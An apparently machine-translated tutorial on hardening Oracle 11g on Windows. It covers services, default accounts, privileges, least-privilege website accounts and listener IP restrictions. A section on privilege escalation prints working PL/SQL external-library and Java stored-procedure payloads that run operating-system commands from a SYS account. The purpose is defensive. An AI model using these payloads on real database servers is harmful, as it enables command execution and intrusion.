Oracle Security Configuration

Oracle Security Configuration
0x01 test environment operating system: window server 2008x64 oracle: oracle 11.2.0.1.0
0x02 oracle Permissions

1. An oracle instance is a database. When a new database is created, a new instance is generated, and an instance runs a process independently.
2. A user corresponds to a scheme. After a user creates a Data Object (such as a table), the scheme is as follows. You can directly access the service by yourself. Other users can access the service by using the "solution name. Object Name" method.
3. By default, users have permissions on data objects under their own solutions, and other users have no corresponding permissions. Sys and system have permissions for all solutions by default.
4. When a user logs on to an oracle instance, he/she must first determine whether the user has the logon permission. If not, he/she cannot log on directly. If yes, the user is successfully logged on. After successful logon, you can determine what you can do based on your permissions. When performing an operation, if you have the permission, the operation succeeds. If you do not have the permission, the operation fails.
5. Oracle mainly has two core processes: one is the service process of oracle, and the other is the listening process. When an external connection to oracle is made, the first is the access listening process, the listening process forwards data to the corresponding oracle instance process based on the database instance you access.

0x03 oracle system services the oracle 11g installed in window server 2008 has a total of seven services. The seven services are described as follows:
A. oracle orcl vss Writer Service: Oracle Volume ing Copy write Service. VSS (Volume Shadow Copy Service) allows storage basic devices (such as disks and arrays) to create high fidelity time point images, that is, shadow copy ). It can create ing copies on multiple volumes or a single volume without affecting the system performance. (Not mandatory)
B. OracleDBConsoleorcl: Oracle Database Console service. orcl is the instance id of Oracle and the default instance is orcl. Start this service when running Enterprise Manager (Enterprise Manager OEM. (Not mandatory)
C. OracleJobSchedulerORCL: Oracle Job Scheduling (timer) service. ORCL is the Oracle instance id. (Not mandatory)
D. OracleMTSRecoveryService: Server Control. This service allows the database to act as a resource manager for transactions in the distributed environment, such as the Microsoft Transaction Server MTS, COM/COM + objects, and transactions. (Not mandatory)
E. OracleOraDb11g_home1ClrAgent: Part of the Oracle database. NET extension service. (Not mandatory)
F. OracleOraDb11g_home1TNSListener: Listener service, which is required only when the database needs remote access. (Not required, but required for external access ).
G. OracleServiceORCL: Database Service (database instance) is the core service of Oracle. It is the basis for database startup. Only when the service is started can the Oracle database be started normally. (Must be started)
What services need to be started during development?
For beginners, if you only use the SQL * plus provided by Oracle, you only need to start OracleServiceORCL. If you use third-party tools such as PL/SQL Developer, the OracleOraDb11g_home1TNSListener service must also be enabled. OracleDBConsoleorcl must be enabled to access the web-based EM, and is rarely used by other services.
0x04 after the oracle default account is installed at oracle11g, there will be many default accounts in the system, except for four, other accounts are locked, if there is no special purpose, please do not open. The other four are:

1. SYS user SYS. When a database is created, SYS users are created and granted the DBA role by default. All basic tables and views in the database data dictionary are stored in the SYS solution, these basic tables and views are very important for Oracle database operations. To maintain the authenticity of the data dictionary, the tables in the SYS solution can only be maintained by the system. They cannot be modified by any users or database administrators, and no users can create tables in the SYS solution.
2. SYSTEM user SYSTEM. Like SYS, when creating an Oracle database, the SYSTEM user is created by default and assigned the DBA role to create a table or view that displays management information, and content tables or views used by various Oracle database applications and tools.
3. DBSNMP user DBSNMP is a user in Oracle Database for Intelligent proxy (Intelligent Agent), used to monitor and manage database-related performance. If you stop this user, you cannot extract relevant data information.
4. SYSMAN is a user used for EM Management in Oracle databases. If you do not need this user, you can delete or lock it.

The passwords of the above four accounts are all set during installation. Generally, DBSNMP and SYSMAN users are not used and are missing. We recommend that you lock them.
0x05 oracle permissions and Role a. oracle permissions are divided into system permissions and object permissions. When a user is created, the user does not have any permissions and cannot perform any operations. To perform a specific database operation, you must grant the system permission to the database. If you want to access objects in other schemes, you must grant them the object permissions.
System permission refers to the right to execute specific types of SQL commands. It is used to control one or more database operations that a user can perform. For example, if you have the create table permission, you can create a table in the solution. If you have the create any table permission, you can create a table in any solution. Oracle provides more than 100 system permissions.
Common system permissions are listed in the following table:

Create session	Connect to database
Create view	Create View
Create procedure	Creation process, functions, and packages
Create cluster	Cluster creation
Create table	Create a table
Create public synonym	Create Synonym
Create trigger	Create a trigger

Common Object permissions are listed in the following table:

Alter	Modify Table Structure
Delete	Delete data
Select	Query data
Insert	Add data
Update	Modify data
Index	Create an index on a table
References	Reference
Execute	Run

Note: all can be used instead of select, update, insert, alter, index, and delete.
B. Role oracle roles are divided into system roles and custom roles. You can specify the appropriate permissions for custom roles as needed. The system roles are described as follows:
DBA: it has all the privileges and is the highest system permission. only DBA can create a database structure.
RESOURCE: users with Resource permissions can only create entities, but cannot create database structures.
CONNECT: users with the Connect permission can only log on, but cannot create entities and database structures.
For common users: grant the connect and resource roles.
For DBA management users: grant the connect, resource, and dba roles.
0x06 solution 1 of oracle's website connection User:

1. Use system to create a user name and assign the "connect" and "resource" roles.
2. Log on with the new user, and then create the required table
3. Use system logon and revoke to create the user's connect and resource roles
4. Use system to log on and grant the create session permission to the new user.
5. Use system to log on and grant the new user the permission to create the USERS tablespace.

Solution 2:

1. Use system to log on and create the table required by the website
2. Use system to log on and create a user name
3. Log on using system, grant the system permission to create a session user, and grant the corresponding object permission to the created table according to the website's needs.
4. Use system to log on and grant the new user the permission to create the USERS tablespace.
5. The website uses the "system. Table Name" format when accessing the database.

0x07 oracle Security configuration Scheme 1. Method 1:
Firewall: in windows, the access ip address of the listening port is specified through the windows Firewall, and in linux, the access ip address of the listening port is specified through iptables.
Method 2:
In windows, you can use ipsec to specify the access ip address of the listening port.
Method 3:
You can specify the accessible ip address in the oracle listener and set the following lines in the file $ ORACLE_HOME/network/admin/sqlnet. ora on the server:

tcp.validnode_checking = yes 

Ip addresses allowed for access

tcp.invited_nodes = (ip1,ip2…) 

Ip addresses not allowed for access

tcp.excluded_nodes=(ip1,ip2,……) 

1. You can modify the listener port to reduce the number of scans.
2. To disable unnecessary services, you can disable unnecessary services to reduce external access. Except that OracleServiceORCL and OracleOraDb11g_home1TNSListener must be enabled, other services can be disabled. In particular, when the OracleDBConsoleorcl service is enabled, the EM for the web version is enabled, and the access port is 1158. Disable the service if you do not need it.
3. All users must set a strong password. When setting a strong password, they must set a strong password of more than 8 characters, including uppercase and lowercase letters, numbers, and special characters.
4. By default, oracle will have four accounts that are not locked. We recommend that you lock DBSNMP and SYSMAN.
5. The processing of privileged accounts limits the remote Logon of database super administrators. A. Set REMOTE_LOGIN_PASSWORDFILE = NONE B in spfile. Set sqlnet. AUTHENTICATION_SERVICES = NONE in SQLNET. ora to disable automatic logon of SYSDBA.
6. Enabling logs can enable logs to audit databases, but also consume resources. You can perform operations based on the actual situation.
7. The minimum permissions of the database account used by the website can be set up based on the recommended solution for connecting to the database account written above.
8. Rational use of the database process account uses a lower-permission account to create a new user and add write permissions to the data directory. If the configuration cannot run after the configuration, you can leave the database process account, grant full control permissions to the entire database directory.
9. Properly configure the permissions of the database process account on the disk. do not grant special permissions other than the database directory. It is recommended that you do not grant the read permissions. You can arrange the permissions based on the actual situation, the principle is that the permissions granted by the database directory can ensure normal operation, and other directories cannot be assigned.

0x08 oracle Elevation of Privilege and defense point 1. Elevation of Privilege through PL/SQL

create or replace library exec_shell as '$ORACLE_HOME\bin\msvcrt.dll';   create or replace procedure execmd (command in char) is external name "system" library exec_shell language c; / exec execmd('net user >netaaa.txt'); 

2. Permission escalation using java

CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVACMD" AS import java.lang.*; import java.io.*; public class JAVACMD { public static void execCommand (String command) throws IOException { Runtime.getRuntime().exec(command); } }; / CREATE OR REPLACE PROCEDURE JAVACMDPROC (p_command IN VARCHAR2) AS LANGUAGE JAVA NAME 'JAVACMD.execCommand (java.lang.String)'; / exec javacmdproc('cmd.exe /c net user > netaaa.txt'); 

If you use sys, the preceding two methods can be obtained successfully, but normal permission users cannot perform the preceding operations. Therefore, the Defense source can only manage sys privileged accounts. However, if a privileged account is obtained by hackers, only a database process account with low permissions can be used, and control the disk permissions of the process account, which can minimize the permissions that hackers can operate on. This article does not discuss how to upgrade an oracle account with low permissions to dba permissions and then escalate permissions from the system.
0x09 common oracle operation commands 1. Connect to the database

conn sys/mima@orcl as sysdba; 

2. Create a user

create user yonghuming identified by mima; 

3. Authorize the user

grant connect, resource to yonghuming; grant create session to yonghuming; alter user yonghuming quota unlimited on USERS; grant unlimited tablespace to yonghuming; grant select on testable to yonghuming; 

4. Cancel authorization

revoke connect , resource from yonghuming; 

5. Delete the locked (unlocked) Account

alter user yonghuming lock; alter user yonghuming unlock; drop user yonghuming cascade;